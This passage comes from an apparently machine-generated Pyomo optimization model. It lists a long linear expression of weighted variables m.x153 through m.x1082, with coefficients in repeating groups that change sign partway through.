0.0054755053520018*m.x153 - 0.0054755053520018*m.x154 - 0.0054755053520018*m.x155 -
0.0054755053520018*m.x156 - 0.0054755053520018*m.x157 - 0.0054755053520018*m.x158 -
0.0054755053520018*m.x159 - 0.0054755053520018*m.x160 - 0.0054755053520018*m.x161 -
0.0054755053520018*m.x162 - 0.00638454686224881*m.x163 - 0.00638454686224881*m.x164 -
0.00638454686224881*m.x165 - 0.00638454686224881*m.x166 - 0.00638454686224881*m.x167 -
0.00638454686224881*m.x168 - 0.00638454686224881*m.x169 - 0.00638454686224881*m.x170 -
0.00638454686224881*m.x171 - 0.00638454686224881*m.x172 - 0.00638454686224881*m.x173 -
0.00638454686224881*m.x174 - 0.00638454686224881*m.x175 - 0.00638454686224881*m.x176 -
0.00638454686224881*m.x177 - 0.00638454686224881*m.x178 - 0.00638454686224881*m.x179 -
0.00638454686224881*m.x180 - 0.00638454686224881*m.x181 - 0.00638454686224881*m.x182 -
0.00638454686224881*m.x183 - 0.00638454686224881*m.x184 - 0.00638454686224881*m.x185 -
0.00638454686224881*m.x186 - 0.00638454686224881*m.x187 - 0.00638454686224881*m.x188 -
0.00638454686224881*m.x189 - 0.00719680515011284*m.x190 - 0.00719680515011284*m.x191 -
0.00719680515011284*m.x192 - 0.00719680515011284*m.x193 - 0.00719680515011284*m.x194 -
0.00719680515011284*m.x195 - 0.00719680515011284*m.x196 - 0.00719680515011284*m.x197 -
0.00719680515011284*m.x198 - 0.00719680515011284*m.x199 - 0.00719680515011284*m.x200 -
0.00719680515011284*m.x201 - 0.00719680515011284*m.x202 - 0.00719680515011284*m.x203 -
0.00719680515011284*m.x204 - 0.00719680515011284*m.x205 - 0.00719680515011284*m.x206 -
0.00719680515011284*m.x207 - 0.00719680515011284*m.x208 - 0.00719680515011284*m.x209 -
0.00719680515011284*m.x210 - 0.00719680515011284*m.x211 - 0.00719680515011284*m.x212 -
0.00719680515011284*m.x213 - 0.00719680515011284*m.x214 - 0.00719680515011284*m.x215 -
0.00719680515011284*m.x216 - 0.00789996720792038*m.x217 - 0.00789996720792038*m.x218 -
0.00789996720792038*m.x219 - 0.00789996720792038*m.x220 - 0.00789996720792038*m.x221 -
0.00789996720792038*m.x222 - 0.00789996720792038*m.x223 - 0.00789996720792038*m.x224 -
0.00789996720792038*m.x225 - 0.00789996720792038*m.x226 - 0.00789996720792038*m.x227 -
0.00789996720792038*m.x228 - 0.00789996720792038*m.x229 - 0.00789996720792038*m.x230 -
0.00789996720792038*m.x231 - 0.00789996720792038*m.x232 - 0.00789996720792038*m.x233 -
0.00789996720792038*m.x234 - 0.00789996720792038*m.x235 - 0.00789996720792038*m.x236 -
0.00789996720792038*m.x237 - 0.00789996720792038*m.x238 - 0.00789996720792038*m.x239 -
0.00789996720792038*m.x240 - 0.00789996720792038*m.x241 - 0.00789996720792038*m.x242 -
0.00789996720792038*m.x243 - 0.00848337381563901*m.x244 - 0.00848337381563901*m.x245 -
0.00848337381563901*m.x246 - 0.00848337381563901*m.x247 - 0.00848337381563901*m.x248 -
0.00848337381563901*m.x249 - 0.00848337381563901*m.x250 - 0.00848337381563901*m.x251 -
0.00848337381563901*m.x252 - 0.00848337381563901*m.x253 - 0.00848337381563901*m.x254 -
0.00848337381563901*m.x255 - 0.00848337381563901*m.x256 - 0.00848337381563901*m.x257 -
0.00848337381563901*m.x258 - 0.00848337381563901*m.x259 - 0.00848337381563901*m.x260 -
0.00848337381563901*m.x261 - 0.00848337381563901*m.x262 - 0.00848337381563901*m.x263 -
0.00848337381563901*m.x264 - 0.00848337381563901*m.x265 - 0.00848337381563901*m.x266 -
0.00848337381563901*m.x267 - 0.00848337381563901*m.x268 - 0.00848337381563901*m.x269 -
0.00848337381563901*m.x270 - 0.00893818112378766*m.x271 - 0.00893818112378766*m.x272 -
0.00893818112378766*m.x273 - 0.00893818112378766*m.x274 - 0.00893818112378766*m.x275 -
0.00893818112378766*m.x276 - 0.00893818112378766*m.x277 - 0.00893818112378766*m.x278 -
0.00893818112378766*m.x279 - 0.00893818112378766*m.x280 - 0.00893818112378766*m.x281 -
0.00893818112378766*m.x282 - 0.00893818112378766*m.x283 - 0.00893818112378766*m.x284 -
0.00893818112378766*m.x285 - 0.00893818112378766*m.x286 - 0.00893818112378766*m.x287 -
0.00893818112378766*m.x288 - 0.00893818112378766*m.x289 - 0.00893818112378766*m.x290 -
0.00893818112378766*m.x291 - 0.00893818112378766*m.x292 - 0.00893818112378766*m.x293 -
0.00893818112378766*m.x294 - 0.00893818112378766*m.x295 - 0.00893818112378766*m.x296 -
0.00893818112378766*m.x297 - 0.00925749471717984*m.x298 - 0.00925749471717984*m.x299 -
0.00925749471717984*m.x300 - 0.00925749471717984*m.x301 - 0.00925749471717984*m.x302 -
0.00925749471717984*m.x303 - 0.00925749471717984*m.x304 - 0.00925749471717984*m.x305 -
0.00925749471717984*m.x306 - 0.00925749471717984*m.x307 - 0.00925749471717984*m.x308 -
0.00925749471717984*m.x309 - 0.00925749471717984*m.x310 - 0.00925749471717984*m.x311 -
0.00925749471717984*m.x312 - 0.00925749471717984*m.x313 - 0.00925749471717984*m.x314 -
0.00925749471717984*m.x315 - 0.00925749471717984*m.x316 - 0.00925749471717984*m.x317 -
0.00925749471717984*m.x318 - 0.00925749471717984*m.x319 - 0.00925749471717984*m.x320 -
0.00925749471717984*m.x321 - 0.00925749471717984*m.x322 - 0.00925749471717984*m.x323 -
0.00925749471717984*m.x324 - 0.00943647412723008*m.x325 - 0.00943647412723008*m.x326 -
0.00943647412723008*m.x327 - 0.00943647412723008*m.x328 - 0.00943647412723008*m.x329 -
0.00943647412723008*m.x330 - 0.00943647412723008*m.x331 - 0.00943647412723008*m.x332 -
0.00943647412723008*m.x333 - 0.00943647412723008*m.x334 - 0.00943647412723008*m.x335 -
0.00943647412723008*m.x336 - 0.00943647412723008*m.x337 - 0.00943647412723008*m.x338 -
0.00943647412723008*m.x339 - 0.00943647412723008*m.x340 - 0.00943647412723008*m.x341 -
0.00943647412723008*m.x342 - 0.00943647412723008*m.x343 - 0.00943647412723008*m.x344 -
0.00943647412723008*m.x345 - 0.00943647412723008*m.x346 - 0.00943647412723008*m.x347 -
0.00943647412723008*m.x348 - 0.00943647412723008*m.x349 - 0.00943647412723008*m.x350 -
0.00943647412723008*m.x351 - 0.00947240620852358*m.x352 - 0.00947240620852358*m.x353 -
0.00947240620852358*m.x354 - 0.00947240620852358*m.x355 - 0.00947240620852358*m.x356 -
0.00947240620852358*m.x357 - 0.00947240620852358*m.x358 - 0.00947240620852358*m.x359 -
0.00947240620852358*m.x360 - 0.00947240620852358*m.x361 - 0.00947240620852358*m.x362 -
0.00947240620852358*m.x363 - 0.00947240620852358*m.x364 - 0.00947240620852358*m.x365 -
0.00947240620852358*m.x366 - 0.00947240620852358*m.x367 - 0.00947240620852358*m.x368 -
0.00947240620852358*m.x369 - 0.00947240620852358*m.x370 - 0.00947240620852358*m.x371 -
0.00947240620852358*m.x372 - 0.00947240620852358*m.x373 - 0.00947240620852358*m.x374 -
0.00947240620852358*m.x375 - 0.00947240620852358*m.x376 - 0.00947240620852358*m.x377 -
0.00947240620852358*m.x378 - 0.00936474626733508*m.x379 - 0.00936474626733508*m.x380 -
0.00936474626733508*m.x381 - 0.00936474626733508*m.x382 - 0.00936474626733508*m.x383 -
0.00936474626733508*m.x384 - 0.00936474626733508*m.x385 - 0.00936474626733508*m.x386 -
0.00936474626733508*m.x387 - 0.00936474626733508*m.x388 - 0.00936474626733508*m.x389 -
0.00936474626733508*m.x390 - 0.00936474626733508*m.x391 - 0.00936474626733508*m.x392 -
0.00936474626733508*m.x393 - 0.00936474626733508*m.x394 - 0.00936474626733508*m.x395 -
0.00936474626733508*m.x396 - 0.00936474626733508*m.x397 - 0.00936474626733508*m.x398 -
0.00936474626733508*m.x399 - 0.00936474626733508*m.x400 - 0.00936474626733508*m.x401 -
0.00936474626733508*m.x402 - 0.00936474626733508*m.x403 - 0.00936474626733508*m.x404 -
0.00936474626733508*m.x405 - 0.0091151263186305*m.x406 - 0.0091151263186305*m.x407 -
0.0091151263186305*m.x408 - 0.0091151263186305*m.x409 - 0.0091151263186305*m.x410 -
0.0091151263186305*m.x411 - 0.0091151263186305*m.x412 - 0.0091151263186305*m.x413 -
0.0091151263186305*m.x414 - 0.0091151263186305*m.x415 - 0.0091151263186305*m.x416 -
0.0091151263186305*m.x417 - 0.0091151263186305*m.x418 - 0.0091151263186305*m.x419 -
0.0091151263186305*m.x420 - 0.0091151263186305*m.x421 - 0.0091151263186305*m.x422 -
0.0091151263186305*m.x423 - 0.0091151263186305*m.x424 - 0.0091151263186305*m.x425 -
0.0091151263186305*m.x426 - 0.0091151263186305*m.x427 - 0.0091151263186305*m.x428 -
0.0091151263186305*m.x429 - 0.0091151263186305*m.x430 - 0.0091151263186305*m.x431 -
0.0091151263186305*m.x432 - 0.00872733034638362*m.x433 - 0.00872733034638362*m.x434 -
0.00872733034638362*m.x435 - 0.00872733034638362*m.x436 - 0.00872733034638362*m.x437 -
0.00872733034638362*m.x438 - 0.00872733034638362*m.x439 - 0.00872733034638362*m.x440 -
0.00872733034638362*m.x441 - 0.00872733034638362*m.x442 - 0.00872733034638362*m.x443 -
0.00872733034638362*m.x444 - 0.00872733034638362*m.x445 - 0.00872733034638362*m.x446 -
0.00872733034638362*m.x447 - 0.00872733034638362*m.x448 - 0.00872733034638362*m.x449 -
0.00872733034638362*m.x450 - 0.00872733034638362*m.x451 - 0.00872733034638362*m.x452 -
0.00872733034638362*m.x453 - 0.00872733034638362*m.x454 - 0.00872733034638362*m.x455 -
0.00872733034638362*m.x456 - 0.00872733034638362*m.x457 - 0.00872733034638362*m.x458 -
0.00872733034638362*m.x459 - 0.00820723694223628*m.x460 - 0.00820723694223628*m.x461 -
0.00820723694223628*m.x462 - 0.00820723694223628*m.x463 - 0.00820723694223628*m.x464 -
0.00820723694223628*m.x465 - 0.00820723694223628*m.x466 - 0.00820723694223628*m.x467 -
0.00820723694223628*m.x468 - 0.00820723694223628*m.x469 - 0.00820723694223628*m.x470 -
0.00820723694223628*m.x471 - 0.00820723694223628*m.x472 - 0.00820723694223628*m.x473 -
0.00820723694223628*m.x474 - 0.00820723694223628*m.x475 - 0.00820723694223628*m.x476 -
0.00820723694223628*m.x477 - 0.00820723694223628*m.x478 - 0.00820723694223628*m.x479 -
0.00820723694223628*m.x480 - 0.00820723694223628*m.x481 - 0.00820723694223628*m.x482 -
0.00820723694223628*m.x483 - 0.00820723694223628*m.x484 - 0.00820723694223628*m.x485 -
0.00820723694223628*m.x486 - 0.00756273019204131*m.x487 - 0.00756273019204131*m.x488 -
0.00756273019204131*m.x489 - 0.00756273019204131*m.x490 - 0.00756273019204131*m.x491 -
0.00756273019204131*m.x492 - 0.00756273019204131*m.x493 - 0.00756273019204131*m.x494 -
0.00756273019204131*m.x495 - 0.00756273019204131*m.x496 - 0.00756273019204131*m.x497 -
0.00756273019204131*m.x498 - 0.00756273019204131*m.x499 - 0.00756273019204131*m.x500 -
0.00756273019204131*m.x501 - 0.00756273019204131*m.x502 - 0.00756273019204131*m.x503 -
0.00756273019204131*m.x504 - 0.00756273019204131*m.x505 - 0.00756273019204131*m.x506 -
0.00756273019204131*m.x507 - 0.00756273019204131*m.x508 - 0.00756273019204131*m.x509 -
0.00756273019204131*m.x510 - 0.00756273019204131*m.x511 - 0.00756273019204131*m.x512 -
0.00756273019204131*m.x513 - 0.00680358016115766*m.x514 - 0.00680358016115766*m.x515 -
0.00680358016115766*m.x516 - 0.00680358016115766*m.x517 - 0.00680358016115766*m.x518 -
0.00680358016115766*m.x519 - 0.00680358016115766*m.x520 - 0.00680358016115766*m.x521 -
0.00680358016115766*m.x522 - 0.00680358016115766*m.x523 - 0.00680358016115766*m.x524 -
0.00680358016115766*m.x525 - 0.00680358016115766*m.x526 - 0.00680358016115766*m.x527 -
0.00680358016115766*m.x528 - 0.00680358016115766*m.x529 - 0.00680358016115766*m.x530 -
0.00680358016115766*m.x531 - 0.00680358016115766*m.x532 - 0.00680358016115766*m.x533 -
0.00680358016115766*m.x534 - 0.00680358016115766*m.x535 - 0.00680358016115766*m.x536 -
0.00680358016115766*m.x537 - 0.00680358016115766*m.x538 - 0.00680358016115766*m.x539 -
0.00680358016115766*m.x540 - 0.00594129479021861*m.x541 - 0.00594129479021861*m.x542 -
0.00594129479021861*m.x543 - 0.00594129479021861*m.x544 - 0.00594129479021861*m.x545 -
0.00594129479021861*m.x546 - 0.00594129479021861*m.x547 - 0.00594129479021861*m.x548 -
0.00594129479021861*m.x549 - 0.00594129479021861*m.x550 - 0.00594129479021861*m.x551 -
0.00594129479021861*m.x552 - 0.00594129479021861*m.x553 - 0.00594129479021861*m.x554 -
0.00594129479021861*m.x555 - 0.00594129479021861*m.x556 - 0.00594129479021861*m.x557 -
0.00594129479021861*m.x558 - 0.00594129479021861*m.x559 - 0.00594129479021861*m.x560 -
0.00594129479021861*m.x561 - 0.00594129479021861*m.x562 - 0.00594129479021861*m.x563 -
0.00594129479021861*m.x564 - 0.00594129479021861*m.x565 - 0.00594129479021861*m.x566 -
0.00594129479021861*m.x567 - 0.00498894544648228*m.x568 - 0.00498894544648228*m.x569 -
0.00498894544648228*m.x570 - 0.00498894544648228*m.x571 - 0.00498894544648228*m.x572 -
0.00498894544648228*m.x573 - 0.00498894544648228*m.x574 - 0.00498894544648228*m.x575 -
0.00498894544648228*m.x576 - 0.00498894544648228*m.x577 - 0.00498894544648228*m.x578 -
0.00498894544648228*m.x579 - 0.00498894544648228*m.x580 - 0.00498894544648228*m.x581 -
0.00498894544648228*m.x582 - 0.00498894544648228*m.x583 - 0.00498894544648228*m.x584 -
0.00498894544648228*m.x585 - 0.00498894544648228*m.x586 - 0.00498894544648228*m.x587 -
0.00498894544648228*m.x588 - 0.00498894544648228*m.x589 - 0.00498894544648228*m.x590 -
0.00498894544648228*m.x591 - 0.00498894544648228*m.x592 - 0.00498894544648228*m.x593 -
0.00498894544648228*m.x594 - 0.00396096877522824*m.x595 - 0.00396096877522824*m.x596 -
0.00396096877522824*m.x597 - 0.00396096877522824*m.x598 - 0.00396096877522824*m.x599 -
0.00396096877522824*m.x600 - 0.00396096877522824*m.x601 - 0.00396096877522824*m.x602 -
0.00396096877522824*m.x603 - 0.00396096877522824*m.x604 - 0.00396096877522824*m.x605 -
0.00396096877522824*m.x606 - 0.00396096877522824*m.x607 - 0.00396096877522824*m.x608 -
0.00396096877522824*m.x609 - 0.00396096877522824*m.x610 - 0.00396096877522824*m.x611 -
0.00396096877522824*m.x612 - 0.00396096877522824*m.x613 - 0.00396096877522824*m.x614 -
0.00396096877522824*m.x615 - 0.00396096877522824*m.x616 - 0.00396096877522824*m.x617 -
0.00396096877522824*m.x618 - 0.00396096877522824*m.x619 - 0.00396096877522824*m.x620 -
0.00396096877522824*m.x621 - 0.00287294785493099*m.x622 - 0.00287294785493099*m.x623 -
0.00287294785493099*m.x624 - 0.00287294785493099*m.x625 - 0.00287294785493099*m.x626 -
0.00287294785493099*m.x627 - 0.00287294785493099*m.x628 - 0.00287294785493099*m.x629 -
0.00287294785493099*m.x630 - 0.00287294785493099*m.x631 - 0.00287294785493099*m.x632 -
0.00287294785493099*m.x633 - 0.00287294785493099*m.x634 - 0.00287294785493099*m.x635 -
0.00287294785493099*m.x636 - 0.00287294785493099*m.x637 - 0.00287294785493099*m.x638 -
0.00287294785493099*m.x639 - 0.00287294785493099*m.x640 - 0.00287294785493099*m.x641 -
0.00287294785493099*m.x642 - 0.00287294785493099*m.x643 - 0.00287294785493099*m.x644 -
0.00287294785493099*m.x645 - 0.00287294785493099*m.x646 - 0.00287294785493099*m.x647 -
0.00287294785493099*m.x648 - 0.00174137597367477*m.x649 - 0.00174137597367477*m.x650 -
0.00174137597367477*m.x651 - 0.00174137597367477*m.x652 - 0.00174137597367477*m.x653 -
0.00174137597367477*m.x654 - 0.00174137597367477*m.x655 - 0.00174137597367477*m.x656 -
0.00174137597367477*m.x657 - 0.00174137597367477*m.x658 - 0.00174137597367477*m.x659 -
0.00174137597367477*m.x660 - 0.00174137597367477*m.x661 - 0.00174137597367477*m.x662 -
0.00174137597367477*m.x663 - 0.00174137597367477*m.x664 - 0.00174137597367477*m.x665 -
0.00174137597367477*m.x666 - 0.00174137597367477*m.x667 - 0.00174137597367477*m.x668 -
0.00174137597367477*m.x669 - 0.00174137597367477*m.x670 - 0.00174137597367477*m.x671 -
0.00174137597367477*m.x672 - 0.00174137597367477*m.x673 - 0.00174137597367477*m.x674 -
0.00174137597367477*m.x675 - 0.000583406607718567*m.x676 - 0.000583406607718567*m.x677 -
0.000583406607718567*m.x678 - 0.000583406607718567*m.x679 - 0.000583406607718567*m.x680 -
0.000583406607718567*m.x681 - 0.000583406607718567*m.x682 - 0.000583406607718567*m.x683 -
0.000583406607718567*m.x684 - 0.000583406607718567*m.x685 - 0.000583406607718567*m.x686 -
0.000583406607718567*m.x687 - 0.000583406607718567*m.x688 - 0.000583406607718567*m.x689 -
0.000583406607718567*m.x690 - 0.000583406607718567*m.x691 - 0.000583406607718567*m.x692 -
0.000583406607718567*m.x693 - 0.000583406607718567*m.x694 - 0.000583406607718567*m.x695 -
0.000583406607718567*m.x696 - 0.000583406607718567*m.x697 - 0.000583406607718567*m.x698 -
0.000583406607718567*m.x699 - 0.000583406607718567*m.x700 - 0.000583406607718567*m.x701 -
0.000583406607718567*m.x702 + 0.000583406607718699*m.x703 + 0.000583406607718699*m.x704 +
0.000583406607718699*m.x705 + 0.000583406607718699*m.x706 + 0.000583406607718699*m.x707 +
0.000583406607718699*m.x708 + 0.000583406607718699*m.x709 + 0.000583406607718699*m.x710 +
0.000583406607718699*m.x711 + 0.000583406607718699*m.x712 + 0.000583406607718699*m.x713 +
0.000583406607718699*m.x714 + 0.000583406607718699*m.x715 + 0.000583406607718699*m.x716 +
0.000583406607718699*m.x717 + 0.000583406607718699*m.x718 + 0.000583406607718699*m.x719 +
0.000583406607718699*m.x720 + 0.000583406607718699*m.x721 + 0.000583406607718699*m.x722 +
0.000583406607718699*m.x723 + 0.000583406607718699*m.x724 + 0.000583406607718699*m.x725 +
0.000583406607718699*m.x726 + 0.000583406607718699*m.x727 + 0.000583406607718699*m.x728 +
0.000583406607718699*m.x729 + 0.0017413759736749*m.x730 + 0.0017413759736749*m.x731 +
0.0017413759736749*m.x732 + 0.0017413759736749*m.x733 + 0.0017413759736749*m.x734 +
0.0017413759736749*m.x735 + 0.0017413759736749*m.x736 + 0.0017413759736749*m.x737 +
0.0017413759736749*m.x738 + 0.0017413759736749*m.x739 + 0.0017413759736749*m.x740 +
0.0017413759736749*m.x741 + 0.0017413759736749*m.x742 + 0.0017413759736749*m.x743 +
0.0017413759736749*m.x744 + 0.0017413759736749*m.x745 + 0.0017413759736749*m.x746 +
0.0017413759736749*m.x747 + 0.0017413759736749*m.x748 + 0.0017413759736749*m.x749 +
0.0017413759736749*m.x750 + 0.0017413759736749*m.x751 + 0.0017413759736749*m.x752 +
0.0017413759736749*m.x753 + 0.0017413759736749*m.x754 + 0.0017413759736749*m.x755 +
0.0017413759736749*m.x756 + 0.00287294785493111*m.x757 + 0.00287294785493111*m.x758 +
0.00287294785493111*m.x759 + 0.00287294785493111*m.x760 + 0.00287294785493111*m.x761 +
0.00287294785493111*m.x762 + 0.00287294785493111*m.x763 + 0.00287294785493111*m.x764 +
0.00287294785493111*m.x765 + 0.00287294785493111*m.x766 + 0.00287294785493111*m.x767 +
0.00287294785493111*m.x768 + 0.00287294785493111*m.x769 + 0.00287294785493111*m.x770 +
0.00287294785493111*m.x771 + 0.00287294785493111*m.x772 + 0.00287294785493111*m.x773 +
0.00287294785493111*m.x774 + 0.00287294785493111*m.x775 + 0.00287294785493111*m.x776 +
0.00287294785493111*m.x777 + 0.00287294785493111*m.x778 + 0.00287294785493111*m.x779 +
0.00287294785493111*m.x780 + 0.00287294785493111*m.x781 + 0.00287294785493111*m.x782 +
0.00287294785493111*m.x783 + 0.00396096877522836*m.x784 + 0.00396096877522836*m.x785 +
0.00396096877522836*m.x786 + 0.00396096877522836*m.x787 + 0.00396096877522836*m.x788 +
0.00396096877522836*m.x789 + 0.00396096877522836*m.x790 + 0.00396096877522836*m.x791 +
0.00396096877522836*m.x792 + 0.00396096877522836*m.x793 + 0.00396096877522836*m.x794 +
0.00396096877522836*m.x795 + 0.00396096877522836*m.x796 + 0.00396096877522836*m.x797 +
0.00396096877522836*m.x798 + 0.00396096877522836*m.x799 + 0.00396096877522836*m.x800 +
0.00396096877522836*m.x801 + 0.00396096877522836*m.x802 + 0.00396096877522836*m.x803 +
0.00396096877522836*m.x804 + 0.00396096877522836*m.x805 + 0.00396096877522836*m.x806 +
0.00396096877522836*m.x807 + 0.00396096877522836*m.x808 + 0.00396096877522836*m.x809 +
0.00396096877522836*m.x810 + 0.00498894544648239*m.x811 + 0.00498894544648239*m.x812 +
0.00498894544648239*m.x813 + 0.00498894544648239*m.x814 + 0.00498894544648239*m.x815 +
0.00498894544648239*m.x816 + 0.00498894544648239*m.x817 + 0.00498894544648239*m.x818 +
0.00498894544648239*m.x819 + 0.00498894544648239*m.x820 + 0.00498894544648239*m.x821 +
0.00498894544648239*m.x822 + 0.00498894544648239*m.x823 + 0.00498894544648239*m.x824 +
0.00498894544648239*m.x825 + 0.00498894544648239*m.x826 + 0.00498894544648239*m.x827 +
0.00498894544648239*m.x828 + 0.00498894544648239*m.x829 + 0.00498894544648239*m.x830 +
0.00498894544648239*m.x831 + 0.00498894544648239*m.x832 + 0.00498894544648239*m.x833 +
0.00498894544648239*m.x834 + 0.00498894544648239*m.x835 + 0.00498894544648239*m.x836 +
0.00498894544648239*m.x837 + 0.00594129479021871*m.x838 + 0.00594129479021871*m.x839 +
0.00594129479021871*m.x840 + 0.00594129479021871*m.x841 + 0.00594129479021871*m.x842 +
0.00594129479021871*m.x843 + 0.00594129479021871*m.x844 + 0.00594129479021871*m.x845 +
0.00594129479021871*m.x846 + 0.00594129479021871*m.x847 + 0.00594129479021871*m.x848 +
0.00594129479021871*m.x849 + 0.00594129479021871*m.x850 + 0.00594129479021871*m.x851 +
0.00594129479021871*m.x852 + 0.00594129479021871*m.x853 + 0.00594129479021871*m.x854 +
0.00594129479021871*m.x855 + 0.00594129479021871*m.x856 + 0.00594129479021871*m.x857 +
0.00594129479021871*m.x858 + 0.00594129479021871*m.x859 + 0.00594129479021871*m.x860 +
0.00594129479021871*m.x861 + 0.00594129479021871*m.x862 + 0.00594129479021871*m.x863 +
0.00594129479021871*m.x864 + 0.00680358016115775*m.x865 + 0.00680358016115775*m.x866 +
0.00680358016115775*m.x867 + 0.00680358016115775*m.x868 + 0.00680358016115775*m.x869 +
0.00680358016115775*m.x870 + 0.00680358016115775*m.x871 + 0.00680358016115775*m.x872 +
0.00680358016115775*m.x873 + 0.00680358016115775*m.x874 + 0.00680358016115775*m.x875 +
0.00680358016115775*m.x876 + 0.00680358016115775*m.x877 + 0.00680358016115775*m.x878 +
0.00680358016115775*m.x879 + 0.00680358016115775*m.x880 + 0.00680358016115775*m.x881 +
0.00680358016115775*m.x882 + 0.00680358016115775*m.x883 + 0.00680358016115775*m.x884 +
0.00680358016115775*m.x885 + 0.00680358016115775*m.x886 + 0.00680358016115775*m.x887 +
0.00680358016115775*m.x888 + 0.00680358016115775*m.x889 + 0.00680358016115775*m.x890 +
0.00680358016115775*m.x891 + 0.00756273019204139*m.x892 + 0.00756273019204139*m.x893 +
0.00756273019204139*m.x894 + 0.00756273019204139*m.x895 + 0.00756273019204139*m.x896 +
0.00756273019204139*m.x897 + 0.00756273019204139*m.x898 + 0.00756273019204139*m.x899 +
0.00756273019204139*m.x900 + 0.00756273019204139*m.x901 + 0.00756273019204139*m.x902 +
0.00756273019204139*m.x903 + 0.00756273019204139*m.x904 + 0.00756273019204139*m.x905 +
0.00756273019204139*m.x906 + 0.00756273019204139*m.x907 + 0.00756273019204139*m.x908 +
0.00756273019204139*m.x909 + 0.00756273019204139*m.x910 + 0.00756273019204139*m.x911 +
0.00756273019204139*m.x912 + 0.00756273019204139*m.x913 + 0.00756273019204139*m.x914 +
0.00756273019204139*m.x915 + 0.00756273019204139*m.x916 + 0.00756273019204139*m.x917 +
0.00756273019204139*m.x918 + 0.00820723694223634*m.x919 + 0.00820723694223634*m.x920 +
0.00820723694223634*m.x921 + 0.00820723694223634*m.x922 + 0.00820723694223634*m.x923 +
0.00820723694223634*m.x924 + 0.00820723694223634*m.x925 + 0.00820723694223634*m.x926 +
0.00820723694223634*m.x927 + 0.00820723694223634*m.x928 + 0.00820723694223634*m.x929 +
0.00820723694223634*m.x930 + 0.00820723694223634*m.x931 + 0.00820723694223634*m.x932 +
0.00820723694223634*m.x933 + 0.00820723694223634*m.x934 + 0.00820723694223634*m.x935 +
0.00820723694223634*m.x936 + 0.00820723694223634*m.x937 + 0.00820723694223634*m.x938 +
0.00820723694223634*m.x939 + 0.00820723694223634*m.x940 + 0.00820723694223634*m.x941 +
0.00820723694223634*m.x942 + 0.00820723694223634*m.x943 + 0.00820723694223634*m.x944 +
0.00820723694223634*m.x945 + 0.00872733034638368*m.x946 + 0.00872733034638368*m.x947 +
0.00872733034638368*m.x948 + 0.00872733034638368*m.x949 + 0.00872733034638368*m.x950 +
0.00872733034638368*m.x951 + 0.00872733034638368*m.x952 + 0.00872733034638368*m.x953 +
0.00872733034638368*m.x954 + 0.00872733034638368*m.x955 + 0.00872733034638368*m.x956 +
0.00872733034638368*m.x957 + 0.00872733034638368*m.x958 + 0.00872733034638368*m.x959 +
0.00872733034638368*m.x960 + 0.00872733034638368*m.x961 + 0.00872733034638368*m.x962 +
0.00872733034638368*m.x963 + 0.00872733034638368*m.x964 + 0.00872733034638368*m.x965 +
0.00872733034638368*m.x966 + 0.00872733034638368*m.x967 + 0.00872733034638368*m.x968 +
0.00872733034638368*m.x969 + 0.00872733034638368*m.x970 + 0.00872733034638368*m.x971 +
0.00872733034638368*m.x972 + 0.00911512631863053*m.x973 + 0.00911512631863053*m.x974 +
0.00911512631863053*m.x975 + 0.00911512631863053*m.x976 + 0.00911512631863053*m.x977 +
0.00911512631863053*m.x978 + 0.00911512631863053*m.x979 + 0.00911512631863053*m.x980 +
0.00911512631863053*m.x981 + 0.00911512631863053*m.x982 + 0.00911512631863053*m.x983 +
0.00911512631863053*m.x984 + 0.00911512631863053*m.x985 + 0.00911512631863053*m.x986 +
0.00911512631863053*m.x987 + 0.00911512631863053*m.x988 + 0.00911512631863053*m.x989 +
0.00911512631863053*m.x990 + 0.00911512631863053*m.x991 + 0.00911512631863053*m.x992 +
0.00911512631863053*m.x993 + 0.00911512631863053*m.x994 + 0.00911512631863053*m.x995 +
0.00911512631863053*m.x996 + 0.00911512631863053*m.x997 + 0.00911512631863053*m.x998 +
0.00911512631863053*m.x999 + 0.0093647462673351*m.x1000 + 0.0093647462673351*m.x1001 +
0.0093647462673351*m.x1002 + 0.0093647462673351*m.x1003 + 0.0093647462673351*m.x1004 +
0.0093647462673351*m.x1005 + 0.0093647462673351*m.x1006 + 0.0093647462673351*m.x1007 +
0.0093647462673351*m.x1008 + 0.0093647462673351*m.x1009 + 0.0093647462673351*m.x1010 +
0.0093647462673351*m.x1011 + 0.0093647462673351*m.x1012 + 0.0093647462673351*m.x1013 +
0.0093647462673351*m.x1014 + 0.0093647462673351*m.x1015 + 0.0093647462673351*m.x1016 +
0.0093647462673351*m.x1017 + 0.0093647462673351*m.x1018 + 0.0093647462673351*m.x1019 +
0.0093647462673351*m.x1020 + 0.0093647462673351*m.x1021 + 0.0093647462673351*m.x1022 +
0.0093647462673351*m.x1023 + 0.0093647462673351*m.x1024 + 0.0093647462673351*m.x1025 +
0.0093647462673351*m.x1026 + 0.00947240620852359*m.x1027 + 0.00947240620852359*m.x1028 +
0.00947240620852359*m.x1029 + 0.00947240620852359*m.x1030 + 0.00947240620852359*m.x1031 +
0.00947240620852359*m.x1032 + 0.00947240620852359*m.x1033 + 0.00947240620852359*m.x1034 +
0.00947240620852359*m.x1035 + 0.00947240620852359*m.x1036 + 0.00947240620852359*m.x1037 +
0.00947240620852359*m.x1038 + 0.00947240620852359*m.x1039 + 0.00947240620852359*m.x1040 +
0.00947240620852359*m.x1041 + 0.00947240620852359*m.x1042 + 0.00947240620852359*m.x1043 +
0.00947240620852359*m.x1044 + 0.00947240620852359*m.x1045 + 0.00947240620852359*m.x1046 +
0.00947240620852359*m.x1047 + 0.00947240620852359*m.x1048 + 0.00947240620852359*m.x1049 +
0.00947240620852359*m.x1050 + 0.00947240620852359*m.x1051 + 0.00947240620852359*m.x1052 +
0.00947240620852359*m.x1053 + 0.00943647412723007*m.x1054 + 0.00943647412723007*m.x1055 +
0.00943647412723007*m.x1056 + 0.00943647412723007*m.x1057 + 0.00943647412723007*m.x1058 +
0.00943647412723007*m.x1059 + 0.00943647412723007*m.x1060 + 0.00943647412723007*m.x1061 +
0.00943647412723007*m.x1062 + 0.00943647412723007*m.x1063 + 0.00943647412723007*m.x1064 +
0.00943647412723007*m.x1065 + 0.00943647412723007*m.x1066 + 0.00943647412723007*m.x1067 +
0.00943647412723007*m.x1068 + 0.00943647412723007*m.x1069 + 0.00943647412723007*m.x1070 +
0.00943647412723007*m.x1071 + 0.00943647412723007*m.x1072 + 0.00943647412723007*m.x1073 +
0.00943647412723007*m.x1074 + 0.00943647412723007*m.x1075 + 0.00943647412723007*m.x1076 +
0.00943647412723007*m.x1077 + 0.00943647412723007*m.x1078 + 0.00943647412723007*m.x1079 +
0.00943647412723007*m.x1080 + 0.00925749471717982*m.x1081 + 0.00925749471717982*m.x1082 +
